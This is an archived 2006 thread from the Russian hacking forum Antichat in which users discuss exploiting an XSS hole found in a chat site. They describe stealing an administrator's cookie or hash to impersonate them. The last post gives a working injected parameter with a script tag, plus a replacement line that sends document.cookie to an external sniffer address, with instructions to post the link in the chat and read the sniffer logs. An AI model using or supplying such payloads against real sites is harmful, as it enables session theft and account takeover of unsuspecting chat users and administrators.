Форум АНТИЧАТ - Вот нашел в чате. Можно ли с этим что-нить сделать?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - Вот нашел в чате. Можно ли с этим что-нить сделать? (https://forum.antichat.xyz/showthread.php?t=15750)

gorevoin

11.03.2006 10:45

Вот нашел в чате. Можно ли с этим что-нить сделать?

не актуально

Tem	11.03.2006 11:49

Цитата:

Уязвимость через XSS или CSS

А тебе не кажится что это одно итожа, нзвание XSS поставили потому что бы не путать Cascading Style Shit с Cross Site Scripting.

Ты правильно написал у себе в подписи : Учиться, учиться и еще раз учиться

DRON-ANARCHY

11.03.2006 12:09

У тебя же есть скрипты уязвимостей... че тебе еще надо-то?=)

Цитата:

Shit

Кхе-кхе...=)))

Tem	11.03.2006 12:40

ДРОН ты непонел ))) ему нужна через xss,взять базу ))))))

Morph

11.03.2006 16:02

ну так пусть берет тока куки пусть получит.

Tem	11.03.2006 17:06

Ты не правильно понел, он Xss путает с СГЛ запросом. Это мне так кажится.

Tem	11.03.2006 23:11

можна только хэш админа поймать

vectorg

12.03.2006 18:55

это xss, с помощью неё можно попробовать забрать хэш админа
если получится его взять, то подставляешь данные админа за место своих, и по идее, если нет какой-нибудь навороченной защиты (по ip например), можно пабыть на некоторое время админом, а там уже как получится...

DRON-ANARCHY

12.03.2006 22:16

Вобщем, к примеру....

Цитата:

au_nick="><script>alert('wvs-xss-magic-string-2125609660')%3B</script>&nicks=1

В этой строке вместо

Цитата:

alert('wvs-xss-magic-string-2125609660')%3B

пишешь..что-то вроде

Цитата:

document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie

потом полученную строку кидаешь в чат и идешь смотреть логи сниффера... а потом.. уже описано, что потом.

Время: 02:44